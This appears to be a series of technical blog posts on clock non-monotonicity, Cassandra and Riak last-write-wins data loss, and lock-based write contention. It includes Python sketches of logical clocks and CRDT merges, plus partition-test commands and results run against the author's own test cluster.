Some folks have asked whether Cassandra or Riak in last-write-wins mode are monotonically consistent, or whether they can guarantee read-your-writes, and so on. This is a fascinating question, and leads to all sorts of interesting properties about clocks and causality.

There are two families of clocks in distributed systems. The first are often termed wall clocks, which correspond roughly to the time obtained by looking at a clock on the wall. Most commonly, a process finds the wall-time clock via gettimeofday(), which is maintained by the operating system using a combination of hardware timers and NTP–a network time synchronization service. On POSIX-compatible systems, this clock returns integers which map to real moments in time via a certain standard, like UTC, POSIX time, or less commonly, TAI or GPS.

The second type are the logical clocks, so named because they measure time associated with the logical operations being performed in the system. Lamport clocks, for instance, are a monotonically increasing integer which are incremented on every operation by a node. Vector clocks are a generalization of Lamport clocks, where each node tracks the maximum Lamport clock from every other node.
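As a concrete illustration, here is a minimal sketch of both kinds of logical clock in Python. The class names are invented for illustration and bear no relation to any particular database's implementation:

# A minimal sketch of logical clocks, for illustration only.

class LamportClock:
    def __init__(self):
        self.counter = 0

    def tick(self):
        # Increment on every local operation.
        self.counter += 1
        return self.counter

    def observe(self, other_counter):
        # On receiving a message, jump ahead of anything we've seen.
        self.counter = max(self.counter, other_counter) + 1
        return self.counter


class VectorClock:
    def __init__(self, node_id):
        self.node_id = node_id
        self.clock = {}  # node id -> highest counter seen from that node

    def tick(self):
        self.clock[self.node_id] = self.clock.get(self.node_id, 0) + 1
        return dict(self.clock)

    def merge(self, other_clock):
        # Take the element-wise maximum of the two vectors, then tick.
        for node, counter in other_clock.items():
            self.clock[node] = max(self.clock.get(node, 0), counter)
        self.tick()

    def descends(self, other_clock):
        # True if this clock has seen everything other_clock has, i.e.
        # the other event is causally in our past.
        return all(self.clock.get(n, 0) >= c for n, c in other_clock.items())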

Consider a typical TCP service. Requests from a client are distributed through one or more load balancers to a pool of stateless application servers, which run the business logic. Those application servers persist their shared state in a distributed database, like Cassandra or Riak. I’m gonna focus on Cassandra since it doesn’t offer logical clocks, but most of this discussion applies to Riak with Last Write Wins enabled, as well. The question at hand: what safety properties will the service’s operations exhibit?

Cassandra uses wall-clock timestamps provided by the server, or optionally by the client, to order writes. It makes several guarantees about the monotonicity of writes and reads given timestamps. For instance, Cassandra guarantees most of the time that if you write successfully to a quorum of nodes, any subsequent read from a quorum of nodes will see that write or one with a greater timestamp.

How do those ordering properties translate to the application’s operations?

Session consistency

Cassandra provides session consistency for timestamps, which means that a process which accesses the database in the context of a session is guaranteed to always read its latest write or one with a higher timestamp. There is, however, no guarantee about the visibility of writes to other nodes. This suggests an important caveat: clients of the service will not read their own writes unless they too maintain an open session (e.g. over a TCP connection) with a particular app server. The app is responsible for ensuring that its application sessions are disconnected if it ever loses its Cassandra session.

[Update] Peter Bailis points out that jbellis reverted the patch adding read-your-writes consistency a week later, so I guess that no Cassandra release has actually tried to provide read-your-writes. My mistake, I think–the ticket and docs are somewhat unclear on the current state of affairs.

OK, so we’re using TCP or long-lived HTTP connections, instead of making discrete HTTP requests to the service, and we’ve added appropriate lifecycle handlers to the app server. Our session now stretches continuously from a given Cassandra node through the application server to the client. Are operations session-consistent?

Well, not exactly. Cassandra uses the JVM’s System.currentTimeMillis() for its time source, which is backed by gettimeofday. Pretty much every Cassandra client out there does something similar. That means that the timestamps for writes made in a session are derived either from a single Cassandra server clock, or a single app server clock. These clocks can flow backwards, for a number of reasons:

  • Hardware wonkiness can push clocks days or centuries into the future or past.
  • Virtualization can wreak havoc on kernel timekeeping.
  • Misconfigured nodes may not have NTP enabled, or may not be able to reach upstream sources.
  • Upstream NTP servers can lie.
  • When the problem is identified and fixed, NTP corrects large time differentials by jumping the clock discontinuously to the correct time.
  • Even when perfectly synchronized, POSIX time itself is not monotonic.

That last one might come as a surprise, because we usually think of POSIX time as being “the number of seconds since an epoch”. This isn’t quite true. Because Of Reasons, POSIX days are defined as 86400 seconds in length. However, real days aren’t exactly 86400 seconds. The powers-that-be occasionally schedule leap seconds to correct for the drift. On those occasions, the system clock will either skip a second, or double-count a second–e.g., counting 59:59.7, 59:59.8, 59:59.9, 59:59.0, 59:59.1, repeating the previous second’s worth of timestamps before continuing on.

There are therefore some POSIX timestamps which do not refer to any time, and there are some POSIX timestamps which refer to two distinct times. This most recently happened on July 1st, 2012, and again a month later. This causes so many problems that Google actually smears out the leap second over the course of the day, preserving monotonicity.

If the system clock goes backwards for any reason, Cassandra’s session consistency guarantees no longer hold. Say a client writes w1 just prior to a leap second, then writes w2 just after the leap second. Session consistency demands that any subsequent read will see w2–but since w2 has a lower timestamp than w1, Cassandra immediately ignores w2 on any nodes where w1 is visible. In fact, Cassandra’s monotonicity guarantees operate in reverse, doing their best to make sure that subsequent writes are not visible.

How do you fix this? Use monotonic clocks. You can’t use Lamport clocks because they’d lead to all kinds of awkwardness between nodes, but vector clocks or dotted version vectors would be appropriate. You can also enforce that time never goes backwards in the context of a session. Both the database and (if client timestamps are used) all client code should check to make sure that timestamps never go backwards in the context of a session or process, and delay timestamp generation if necessary. Higher latencies or client-side exceptions are almost certainly preferable to silently lost data.
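For example, a client-side timestamp source that refuses to run backwards might look like this sketch in Python. It is not any particular driver's implementation, just the shape of the check described above:

import time
import threading

class MonotonicTimestamper:
    """Hands out microsecond timestamps that never go backwards within
    this process, even if the wall clock does. A sketch only: a real
    client would also need to survive process restarts."""

    def __init__(self):
        self.lock = threading.Lock()
        self.last = 0

    def timestamp(self):
        with self.lock:
            now = int(time.time() * 1_000_000)
            if now <= self.last:
                # Wall clock stalled or jumped backwards (NTP step, leap
                # second, VM migration): refuse to follow it. Bumping by
                # one is the cheap option; sleeping until the wall clock
                # catches up is the honest one.
                now = self.last + 1
            self.last = now
            return now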

Monotonic reads and writes

Cassandra also claims to offer monotonic read consistency, which means that if a client has seen any particular value for a key, it will never read an older value.

Because system clocks are not monotonic, writes can’t be monotonic either. Consider the same sequence as before:

  1. Process A writes w1 with timestamp t=2
  2. Process A writes w2 with timestamp t=1
  3. Process A reads w1, but expected w2

These writes are clearly not monotonic: w2 should have won. We could also consider multiple clients. This case doesn’t require system clocks to go backwards–it can happen whenever clocks aren’t tightly synchronized between database servers or client nodes:

  1. Process A writes w1 with timestamp t=2
  2. Process B reads w1
  3. Process B writes w2 with timestamp t=1
  4. Process B reads w1, but expected w2

It’s a little tough to work around this one because w2 isn’t just temporarily invisible–it’s gone forever. It might survive on an isolated node for a bit, but eventually the Cassandra or Riak LWW rules will ensure it’s destroyed in favor of the earlier write, because its timestamp is smaller. Depending on whether you consider successfully written values as “seen” by a process, this violates monotonic reads as well.

Again, this isn’t a bug in the database–as far as LWW is concerned, this is correct behavior. It’s a problem with the coupling between the wall-clock causality model and the application model. If a client considers the data that it writes successfully as “seen”, LWW can’t preserve monotonicity.
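Both failure modes above reduce to a single rule. Here it is as a toy LWW register in Python: this is not Cassandra's or Riak's actual code, just the resolution rule they apply.

# A toy last-write-wins register. Each version is a (timestamp, value) pair;
# the highest timestamp wins, regardless of real-time order.

def lww_merge(a, b):
    return a if a[0] >= b[0] else b

w1 = (2, "w1")   # Process A writes w1 at t=2
w2 = (1, "w2")   # Process B, with a lagging clock, writes w2 at t=1

print(lww_merge(w1, w2))  # => (2, 'w1'): w2 is silently discarded,
                          # even though it was written later in real time.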

Doomstones

Deletes in Cassandra and Riak work by writing a tombstone record, which has a particular timestamp. All objects with a lower timestamp will be silently deleted until GC removes the tombstone record–which means that a rogue client or node can cause the destruction of every write to a record for days to weeks afterwards.

  1. Process A deletes a row with t=100000000
  2. Process B writes w1 with timestamp t=1
  3. Process B reads null, but expected w1
  4. This continues for days

This actually happens all the time in LWW systems, but on short-enough timescales that you might not notice. Every time you delete a cell or row, or empty a CQL collection, all writes to that record are discarded for a short time frame–however many seconds separate A’s clock from the furthest-behind node. This is why it’s so hard to write automated tests for Riak which do rapid create/delete cycles without vclocks: you start dipping below the causality horizon, so to speak.

This behavior violates strong, eventual, causal, read-your-writes, session, and monotonic write consistency, and depending on how you interpret “seen”, violates monotonic read consistency as well.

What does all this mean?

Timestamps, as implemented in Riak, Cassandra, et al, are fundamentally unsafe ordering constructs. In order to guarantee consistency you, the user, must ensure locally monotonic and, to some extent, globally monotonic clocks. This is a hard problem, and NTP does not solve it for you. When wall clocks are not properly coupled to the operations in the system, causal constraints can be violated. To ensure safety properties hold all the time, rather than probabilistically, you need logical clocks.

The safest option I can think of is to use a strong coordinator for your timestamps, like an atomic incrementing counter in Zookeeper. That’s slow and limits your availability, but there are some tricks you can use to slice the problem into more manageable pieces, reducing contention. You probably don’t need coordinated timestamps between Cassandra rows or Riak objects, for example.
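As a sketch of that approach in Python, using the kazoo ZooKeeper client: the ensemble address and znode path are made up, and retries, timeouts, and error handling are omitted.

from kazoo.client import KazooClient
from kazoo.exceptions import BadVersionError

zk = KazooClient(hosts="zk1:2181,zk2:2181,zk3:2181")  # hypothetical ensemble
zk.start()

PATH = "/timestamps/users"   # one counter per object family, to cut contention

def next_timestamp():
    """Atomically increment the counter and return the new value.
    A sketch: retries forever, and every call is a ZooKeeper round trip."""
    zk.ensure_path(PATH)
    while True:
        data, stat = zk.get(PATH)
        current = int(data) if data else 0
        try:
            # set() with a version is a compare-and-set: it fails if
            # someone else incremented the counter since our read.
            zk.set(PATH, str(current + 1).encode(), version=stat.version)
            return current + 1
        except BadVersionError:
            continue  # lost the race; read and try again

Every timestamp is now a round trip to the ZooKeeper ensemble, which is exactly the latency and availability cost mentioned above; keeping one counter per row or object family is one way to slice up the contention.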

A somewhat less safe but reasonable option is to use NTP rigorously on your machines, and sync it to TAI or GPS instead of POSIX time or UTC. Make sure you measure your clock skew: everyone I know who says they run NTP has discovered, at one point or another, that a node was way out of sync. If you want rough correspondence to POSIX time, you can still ensure monotonicity by running your own NTP pool and slurring leap seconds over longer time frames.

Or you could choose a database which supports logical clocks for operations where consistency guarantees matter. Chances are your system has some operations where safety is critical–for those, use logical clocks. When it’s OK to have fuzzy ordering constraints, feel free to use wall clocks. They’re often slightly faster, even if their behavior is harder to reason about than their logical counterparts.

For a good non-mathematical overview of weak consistency properties, see Werner Vogels' Eventually Consistent paper. Google’s Spanner paper explores strong consistency guarantees which are achievable by placing strict bounds on clock skew. To explore consistency coupling in more detail, including how to overlay stronger consistency models onto weaker datastores, try Peter Bailis' Bolt-on Causal Consistency. Happy reading!

Previously in Jepsen, we discussed MongoDB. Today, we’ll see how last-write-wins in Riak can lead to unbounded data loss.

If you like it then you Dynamo a ring on it

So far we’ve examined systems which aimed for the CP side of the CAP theorem, both with and without failover. We learned that primary-secondary failover is difficult to implement safely (though it can be done; see, for example, ZAB or Raft). Now I’d like to talk about a very different kind of database–one derived from Amazon’s Dynamo model.

Amazon designed Dynamo with the explicit goals of availability and partition tolerance–and partition-tolerant systems automatically handle node failure. It’s just a special kind of partition. In Dynamo, all nodes are equal participants in the cluster. A given object is identified by a key, which is consistently hashed into N slots (called “partitions”; not to be confused with a network partition) on a ring. Those N slots are claimed by N (hopefully distinct) nodes in the cluster, which means the system can, once data is replicated, tolerate up to N-1 node failures without losing data.

When a client reads from a Dynamo system, it specifies an R value: the number of nodes required to respond for a read to be successful. When it writes, it can specify W: the number of nodes which have to acknowledge the write. There’s also DW for “durable write”, and others. Riak has sometimes referred to these as “tunable CAP controls”: if you choose R=W=1, your system will be available even if all but one node fail–but you may not read the latest copy of data. If R + W is greater than N, you’re “guaranteed to read acknowledged writes”, with caveats. The defaults tend to be R=W=quorum, where quorum is N/2+1.
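The arithmetic behind that guarantee is simple pigeonholing: with only N replicas, any R-sized read set must overlap any W-sized write set when R + W > N. A brute-force check in Python, purely for illustration:

from itertools import combinations

def overlap_guaranteed(n, r, w):
    """True if every R-subset of N replicas intersects every W-subset."""
    replicas = range(n)
    return all(set(rs) & set(ws)
               for rs in combinations(replicas, r)
               for ws in combinations(replicas, w))

print(overlap_guaranteed(3, 2, 2))  # True:  R + W = 4 > N = 3
print(overlap_guaranteed(3, 1, 1))  # False: R + W = 2 <= N; reads can miss writes

The caveats show up shortly: sloppy quorums let fallback vnodes count toward W, which quietly breaks this overlap argument.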

Dynamo handles partitions by healing the ring. Each connected set of machines establishes a set of fallback vnodes, to handle the portions of the ring which are no longer accessible. Once failover is complete, a Dynamo cluster split into two disjoint components will have two complete hash rings, and (eventually, as repair completes) 2 * N copies of the data (N in each component). When the partition heals, the fallback vnodes engage in hinted handoff, giving their data back to the original “primary” vnodes.

A totally connected Dynamo cluster
Two nodes are partitioned away

Since any node can accept writes for its portion of the keyspace, a Dynamo system can theoretically achieve 100% availability, even when the network fails entirely. This comes with two drawbacks. First, if no copy of a given object is available in an isolated set of nodes, that part of the cluster can accept writes for that object, but the first reads will return 404. If you’re adding items to a shopping cart and a partition occurs, your cart might appear to be empty. You could add an item to that empty cart, and it’d be stored, but depending on which side of the partition you talk to, you might see 20 items or just one.

When the partition heals, we have a new problem: it’s not clear which version of an object is authoritative. Dynamo employs a causality-tracing algorithm called vector clocks, which means it knows which copies of an object have been overwritten by updates, and which copies are actually conflicts–causally unconnected–due to concurrent writes.

Concurrent. We were talking about partitions, right? Two writes are concurrent if they happen in different components and can’t see each other’s changes, because the network didn’t let them communicate.

Well that’s interesting, because we’re also used to concurrency being a property of normal database systems. If two people read an object, then write it back with changes, those writes will also conflict. In a very real sense, partitions are just really big windows of concurrency. We often handle concurrent writes in relational databases with multi-version concurrency control or locks, but we can’t use locks here because the time horizons could be minutes or hours, and there’s no safe way to distribute a lock algorithm over a partition. We need a different approach. We need to be able to merge arbitrary conflicting objects for Dynamo to work. From the paper:

For instance, the application that maintains customer shopping carts can choose to “merge” the conflicting versions and return a single unified shopping cart. Despite this flexibility, some application developers may not want to write their own conflict resolution mechanisms and choose to push it down to the data store, which in turn chooses a simple policy such as “last write wins”.

Last write wins. That sounds like a timestamp. Didn’t we learn that Clocks Are Not To Be Trusted? Let’s try it and find out!

Riak with last-write-wins

Riak is an excellent open-source adaptation of the Dynamo model. It includes a default conflict resolution mode of last-write-wins, which means that every write includes a timestamp, and when conflicts arise, it picks the one with the higher timestamp. If our clocks are perfectly synchronized, this ensures we pick the most recent value.

To be clear: there are actually two settings in Riak which affect conflict resolution: lww=true, which turns off vector clock analysis entirely, and allow_mult=false, which uses vector clocks but picks the sibling with the highest timestamp. Setting allow_mult=false is safer, and that’s the setting I’m referring to by “last write wins.” All cases of data loss in this post apply to both settings, though.

First, let’s install Riak, join the nodes together, and tell the cluster to commit the change:

salticid riak.setup
salticid riak.join
salticid riak.commit

You can watch the logs with salticid riak.tail. Watch salticid riak.transfers until there are no handoffs remaining. The cluster is now in a stable state.

For this particular application we’ll be adding numbers to a list stored in a single Riak object. This is a typical use case for Dynamo systems–the atomic units in the system are keys, not rows or columns. Let’s run the app with last-write-wins consistency:

lein run riak lww-sloppy-quorum
Writes completed in 5.119 seconds
2000 total
2000 acknowledged
566 survivors
1434 acknowledged writes lost! (╯°□°)╯︵ ┻━┻
1 2 3 4 6 8 ... 1990 1991 1992 1995 1996 1997
1.0 ack rate
0.717 loss rate
Can't read my / can't read my / no he can't read my / Daaata raaaace!

Riak lost 71% of acknowledged writes on a fully-connected, healthy cluster. No partitions. Why?

Remember how partitions and concurrency are essentially the same problem? Simultaneous writes are causally disconnected. If two clients write values which descend from the same object, Riak just picks the write with the higher timestamp, and throws away the other write. This is a classic data race, and we know how to fix those: just add a mutex. We’ll wrap all operations against Riak in a perfectly consistent, available distributed lock.

“But you can’t do that! That violates the CAP theorem!”

Clever girl. Jepsen lets us pretend, though:

lein run lock riak-lww-sloppy-quorum
Writes completed in 21.475 seconds
2000 total
2000 acknowledged
2000 survivors
All 2000 writes succeeded. :-D

Problem solved! No more write conflicts. Now let’s see how it behaves under a partition by running salticid jepsen.partition during a run:

237 :ok
242 :ok
247 :ok
252 :ok
257 :ok
262 timeout
85 :ok
204 timeout
203 timeout
106 :ok
209 timeout
267 timeout
90 :ok
And now you won't stop calling me / I'm kinda busy

The first thing you’ll notice is that our writes start to lag hard. Some clients are waiting to replicate a write to a majority of nodes, but one side of the partition doesn’t have a majority available. Even though Riak is an AP design, it can functionally become unavailable while nodes are timing out.

Those requests time out until Riak determines those nodes are inaccessible, and sets up fallback vnodes. Once the fallback vnodes are in place, writes proceed on both sides of the cluster, because both sides have a majority of vnodes available. This is by design in Dynamo. Allowing both components to see a majority is called a sloppy quorum, and it allows both components to continue writing data with full multi-node durability guarantees. If we didn’t set up fallback vnodes, a single node failure could destroy our data.

Before collecting results, let’s heal the cluster: salticid jepsen.heal. Remember to wait for Riak to recover, by waiting until salticid riak.transfers says there’s no data left to hand off.

Writes completed in 92.773 seconds
2000 total
1985 acknowledged
176 survivors
1815 acknowledged writes lost! (╯°□°)╯︵ ┻━┻
85 90 95 100 105 106 ... 1994 1995 1996 1997 1998 1999
6 unacknowledged writes found! ヽ(´ー`)ノ
(203 204 218 234 262 277)
0.9925 ack rate
0.91435766 loss rate
0.00302267 unacknowledged but successful rate

91% data lost. This is fucking catastrophic, ladies.

And all the other nodes / Conflict with me

What happened? When the partition healed, Riak had essentially two versions of the list: one from each side of the partition (plus some minorly divergent copies on each side). Last-write-wins means we pick the one with the higher timestamp. No matter what you do, all the writes from one side or the other will be discarded.

If your Riak cluster partitions, and you write to a node which can’t reach any of the original copies of the data, that write of a fresh object can overwrite the original record–destroying all the original data.

Strict quorum

The problem is that we allowed writes to proceed on both sides of the partition. Riak has two more settings for reads and writes: PR and PW, for primary read and write, respectively. PR means you have to read a value from at least that many of the original owners of a key: fallback vnodes don’t count. If we set both PR and PW to quorum, operations against a given key will only be able to proceed in one component of a partitioned cluster. That’s a CP system, right?

lein run lock riak-lww-quorum
274 :ok
1250 :ok
279 com.basho.riak.client.RiakRetryFailedException: com.basho.riak.pbc.RiakError: {pw_val_unsatisfied,2,1}
1381 :ok
277 com.basho.riak.client.RiakRetryFailedException: com.basho.riak.pbc.RiakError: {pr_val_unsatisfied,2,1}

Here we see the cluster denying a write and a read, respectively, to clients which can’t see a majority of the primary nodes for a key. Note that because the quorums are spread around the nodes, a Dynamo system will be partially available in this mode. In any given component, you’ll be able to read and write some fraction of the keys, but not others.

2000 total
1971 acknowledged
170 survivors
1807 acknowledged writes lost! (╯°□°)╯︵ ┻━┻
86 91 95 96 100 101 ... 1994 1995 1996 1997 1998 1999
6 unacknowledged writes found! ヽ(´ー`)ノ
(193 208 219 237 249 252)
0.9855 ack rate
0.9167935 loss rate
0.00304414 unacknowledged but successful rate
You must not know CP / You must not know CP

PR=PW=R=W=quorum still allowed 92% write loss. We reported failure for more writes than before, so that’s a start–but what gives? Shouldn’t this have been CP?

The problem is that failed writes may still be partially successful. Dynamo is designed to preserve writes as much as possible. Even though a node might return “PW val unsatisfied” when it can’t replicate to the primary vnodes for a key, it may have been able to write to one primary vnode–or any number of fallback vnodes. Those values will still be exchanged during read-repair, considered as conflicts, and the timestamp used to discard the older value–meaning all writes from one side of the cluster.

This means the minority component’s failing writes can destroy all of the majority component’s successful writes. Repeat after me: Clocks. Are. Evil.

Embrace your siblings

I can't help feeling we could have had it all

Is there no hope? Is there anything we can do to preserve my writes in Riak?

Yes. We can use CRDTs.

If we enable allow_mult in Riak, the vector clock algorithms will present both versions to the client. We can combine those objects together using a merge function. If the merge function is associative, commutative, and idempotent over that type of object, we can guarantee that it always converges to the same value regardless of the order of writes. If the merge function doesn’t discard data (like last-write-wins does), then it will preserve writes from both sides.

In this case, we’re accumulating a set of numbers. We can use set union as our merge function, or 2P sets, or OR sets, if we need to remove numbers.
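For this workload the merge function really is tiny. A sketch of the state-based idea in Python (this is not the Jepsen client's code, just the union rule it relies on):

# A state-based grow-only set (G-set). Merge is set union: associative,
# commutative, and idempotent, so replicas converge regardless of the
# order, or number of times, states are exchanged.

def merge(a, b):
    return a | b

# Two sides of a partition accept different writes...
side1 = {1, 2, 3, 5}
side2 = {1, 2, 4, 6}

# ...and when the partition heals, nothing is lost.
print(merge(side1, side2))                          # {1, 2, 3, 4, 5, 6}
print(merge(side1, side2) == merge(side2, side1))   # commutative: True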

lein run riak-crdt
Writes completed in 80.918 seconds
2000 total
1948 acknowledged
2000 survivors
All 2000 writes succeeded. :-D

CRDTs preserve 100% of our writes. We still have false negatives in this demo, because the client timed out on a few writes which Riak was still propagating, when the partition first began. False negatives are OK, though, because state-based CRDTs are idempotent. We can repeat our writes arbitrarily many times, in any order, without duplicating data.

Moreover, CRDTs are an AP design: we can write safely and consistently even when the cluster is totally partitioned–for example, when no majority exists. They’re also eventually consistent (in a safe, data-preserving sense) when components are partitioned away from all copies of a given object and are forced to start from scratch.

All of the writes (na na na na NAA NA na na na na NAA NA)

Strategies for working with Riak

Sean Cribbs is the DARE Lion.

Enable allow_mult. Use CRDTs.

Seriously. LWW never should have been the standard behavior for a Dynamo system, but Basho made it the default after customers complained that they didn’t like the complexity of reasoning about siblings. Customers are the only reason Riak exists, and this behavior is gonna seem OK until you start experiencing partitions (and remember, fault tolerance is the reason you chose Riak in the first place), so we’re stuck with a default config which promotes simple-yet-dangerous behavior.

As a consequence of that decision, community resources which people rely on to learn how to use Riak are often aimed towards last-write-wins. Software isn’t just an artifact, but a culture around its use. I don’t really know what we can learn from this, besides the fact that engineering and culture are tough problems.

CRDTs may be too large, too complex, or too difficult to garbage-collect for your use case. However, even if you can’t structure your data as a full CRDT, writing a hacked-together merge function which just takes care of a couple important fields (say, set union over your friend list and logical OR over the other fields) can go a long way towards preventing catastrophic data loss.

There are cases where last-write-wins is a safe strategy. If your data is immutable, then it doesn’t matter which copy you choose. If your writes mean “I know the full correct state of this object at this time”, it’s safe. Many caches and backup systems look like this. If, however, your writes mean “I am changing something I read earlier,” then LWW is unsafe.

Finally, you can decide to accept dropped data. All databases will fail, in different ways, and with varying probabilities. Riak’s probability distribution might be OK for you.

Introducing locks is a bad idea. Even if they did prevent data loss–and as we saw, they don’t–you’ll impose a big latency cost. Moreover, locks restrict your system to being CP, so there’s little advantage to having an AP database. However, some really smart folks at Basho are working on adding Paxos rounds for writes which need to be CP. Having a real consensus protocol will allow Riak’s distributed writes to be truly atomic.

So: we’ve seen that Riak’s last-write-wins is fundamentally unsafe in the presence of network partitions. You can lose not only writes made during the partition, but all writes made at any time prior. Riak is an AP system, and its tunable CAP controls only allow you to detect some forms of write loss–not prevent it. You can’t add consistency to a database by tacking on a lock service because wall clock time doesn’t matter: consistency is a causal property of the relationships between the writes themselves. AP systems involve fundamentally different kinds of data structures, with their own unique tradeoffs.

In the next post, we’ll review what we’ve learned from these four distributed systems, and where we go from here.


Write contention occurs when two people try to update the same piece of data at the same time.

We know several ways to handle write contention, and they fall along a spectrum. For strong consistency (or what CAP might term “CP”) you can use explicit locking, perhaps provided by a central server; or optimistic concurrency where writes proceed through independent transactions, but can fail on conflicting commits. These approaches need not be centralized: consensus protocols like Paxos or two-phase-commit allow a cluster of machines to agree on an isolated transaction–either with pessimistic or optimistic locking, even in the face of some failures and partitions.

On the other end of the spectrum are the AP solutions, where both writes are accepted, but are resolved at a later time. If the resolution process is monotonic (always progresses towards a stable value regardless of order), we call the system “eventually consistent”. Given sufficient time to repair itself, some correct value will emerge.

What kind of resolution function should we use? Well our writes happen over time, and newer values are more correct than old ones. We could pick the most recently written value, as determined by a timestamp. Assuming our clocks are synchronized more tightly than the time between conflicting writes, this guarantees that the last write wins.

But wait! If I’m storing a list of the 500,000 people who follow, say, @scoblizer, and two people follow him at the same time… and last-write-wins chooses the most recently written set of followers… I’ll have lost a write! That’s bad! It’s rare–at Showyou we saw conflicts in ~1% of follower lists–but it still disrupts the user experience enough that I care about solving the problem correctly. My writes should never be lost so long as Riak is doing its thing.

Well, Riak is naturally AP, and could accept both writes simultaneously, and you could resolve them somehow. OR-sets are provably correct, fit quite naturally to how you expect following to work, and reduce the probability of any contention to single elements, rather than the entire set. But maybe we haven’t heard of CRDTs yet, or thought (as I did for some time) that 2P sets were as good as it gets. That’s OK; CRDTs have only been formally described for a couple of years.

Serializing writes with mutexes

So what if we used locking on top of Riak?

Before writing an object, I acquire a lock with a reliable network service. It guarantees that I, and I alone, hold the right to write to /followers-of/scoblizer. While holding that lock I write to Riak, and when the write is successful, I release the lock. No two clients write at the same time, so write contention is eliminated! Our clocks are tightly synchronized by GPS or atomic clocks, and we aggressively monitor clock skew.
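In Python the pattern looks something like this sketch: kazoo for the lock, and read_followers/write_followers as hypothetical stand-ins for the Riak client calls.

from kazoo.client import KazooClient

zk = KazooClient(hosts="zk1:2181")   # hypothetical lock service
zk.start()

def add_follower(user, follower, read_followers, write_followers):
    """read_followers/write_followers are hypothetical helpers wrapping
    the Riak client. The lock serializes our read-modify-write cycles..."""
    lock = zk.Lock("/locks/followers-of/" + user, "app-server-1")
    with lock:
        followers = read_followers(user)    # e.g. an R=quorum read
        followers.add(follower)
        write_followers(user, followers)    # e.g. a W=DW=quorum write
    # ...but, as we're about to see, it cannot serialize what Riak's
    # replicas do with those writes during a partition.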

This does not prevent write contention.

When we issue a write to Riak, the coordinating node–the one we’re talking to as a client–computes the preflist for the key we’re going to write. If our replication factor N is 3, it sends a write to each of 3 vnodes. Then it waits for responses. By default it waits for W = (N/2 + 1) “write confirmed” responses, and also for DW = (N/2 + 1) confirmations that the write is saved on disk, not just in memory. If one node crashes, or is partitioned during this time, our write still succeeds and all is well.

That’s OK–there was no conflict, because the lock service prevented it! And our write is (assuming clocks are correct) more recent than whatever that crashed node had, so when the crashed node comes back we’ll know to discard the old value, the minority report. All we need for that is to guarantee that every read checks at least R = (N/2 + 1) copies, so at least one of our new copies will be available to win a conflict resolution. If we ever read with R=1 we could get that solitary old copy from the failed node. Maybe really old data, like days old, if the node was down for that long. Then we might write that data back to Riak, obliterating days worth of writes. That would definitely be bad.

OK, so read with quorum and write with quorum. Got it.

Partitions

What if that node failed to respond–not because it crashed–but because of a partition? What if, on the other side of the network curtain, there are other parts of our app also trying to add new followers?

Let’s say we read the value “0”, and go to write version “1”. The riak coordinator node completes two writes, but a partition occurs and the third doesn’t complete. Since we used W=quorum, this still counts as success and we think the write completed.

Meanwhile, Riak has detected the partition, and both sides shuffle new vnodes into rotation to recover. There are now two complete sets of vnodes, one on each side. Clients talking to either side will see their writes succeed, even with W=DW=quorum (or W=all, for that matter).

When the partition is resolved, we take the most recent timestamp to decide which cluster’s copy wins. All the writes on the other side of the partition will be lost–even though we, as clients, were told they were successful. W & DW >= quorum is not sufficient; we need PW >= quorum to report writes that only reach fallback vnodes as failures.

Well that tells the client there was a failure, at least. But hold on… those fallback vnodes still accepted the writes and wrote them down dutifully. They’re on disk and are just as valid as the writes on the “majority” side of the partition! We can read them back immediately, and when the partition is resolved those “failed” writes have a ~1 in 2 chance (assuming an even distribution of writes between partitions) of winning last-write-wins–again, obliterating writes to the primary vnodes which were claimed to be successful! Or maybe the majority side was more recently written, and the minority writes are lost. Either way, we are guaranteed to lose data.

Nowhere in the above scenario did two writes have to happen “simultaneously”. The locking service is doing its job and keeping all writes neatly sequential. This illustrates an important point about distributed systems:

“Simultaneous” is about causality, not clocks.

The lock service can only save us if it knows the shape of the partition. It has to understand that events on both sides of the partition happen concurrently, from the point of view of Riak, and to grant any locks to the minority side would no longer provide a mutual exclusion of writes in the logical history of the Riak object.

The lock service, therefore, must be distributed. It must also be isomorphic to the Riak topology, so that when Riak is partitioned, the lock service is partitioned in the same way; and can tell us which nodes are “safe” and which are “dead”. Clients must obtain locks not just for keys, but for hosts as well.

One way to provide these guarantees is to build the locking service into Riak itself: jtuple has been thinking about exactly this problem. Alternatively, we could run a consensus protocol like Zookeeper on the Riak nodes and trust that partitions will affect both kinds of traffic the same way.

So finally, we’ve succeeded: in a partition, the smaller side shuts down. We are immediately Consistent and no longer Available, in the CAP sense; but our load balancer could distribute requests to the majority partition and all is well.

What’s a quorum, anyway?

OK, so maybe I wasn’t quite honest there. It’s not clear which side of the partition is “bigger”.

Riak has vnodes. Key “A” might be stored on nodes 1, 2, and 3, “B” on 3, 4, and 5, and “C” on 6, 7, and 8. If a partition separates nodes 1-4 from 5-8, nodes 1-4 will have all copies of A, two of B, and none of C. There are actually M ensembles at work, where M = ring_size. Riak will spin up fallback vnodes for the missing sections of the ring, but they may have no data. It’s a good thing we’re using PR >= quorum, because if we didn’t, we could read an outdated copy of an object–or even get a not_found when one really exists!
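To make the bookkeeping concrete, here's the toy ring above in a few lines of Python, with hard-coded preflists rather than Riak's actual ring-claim algorithm:

# Primary replicas for each key in the toy ring above.
preflists = {
    "A": {1, 2, 3},
    "B": {3, 4, 5},
    "C": {6, 7, 8},
}

quorum = 2                  # floor(N/2) + 1 with N = 3
component = {1, 2, 3, 4}    # the side of the partition we can reach

for key, primaries in preflists.items():
    reachable = primaries & component
    print(key, "reachable primaries:", len(reachable),
          "PR=quorum possible:", len(reachable) >= quorum)

# A: 3 reachable -> fine on this side
# B: 2 reachable -> fine here, but fails on the 5-8 side
# C: 0 reachable -> every PR=quorum operation on C fails here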

This is absolutely critical. If we read a not_found, interpret it as an empty set of followers, add one user, and save, we could obliterate the entire record when the partition resolves–except for the single user we just added. A half-million followers gone, just like that.

Since there are M ensembles distributed across the partition in varying ways, we can’t pick an authoritative side to keep running. We can either shut down entirely, or allow some fraction of our requests (depending on the ring size, number of nodes, number of replicas, and the partition shape) to fail. If our operations involve touching multiple keys, the probability of failure grows rapidly.

This system cannot be said to be highly available, even if the coordination service works perfectly. If more than N/2 + 1 nodes are partitioned, we must fail partly or completely.

In fact, strictly speaking, we don’t even have the option of partial failure. If the cluster partitions after we read a value, a subsequent write will still go through to the fallback vnodes and we have no way to stop ourselves. PW doesn’t prevent writes from being accepted; it just returns a failure code. Now our write is sitting in the minority cluster, waiting to conflict with its sibling upon resolution.

The only correct solution is to shut down everything during the partition. Assuming we can reliably detect the partition. We can do that, right?

Partitions never happen!

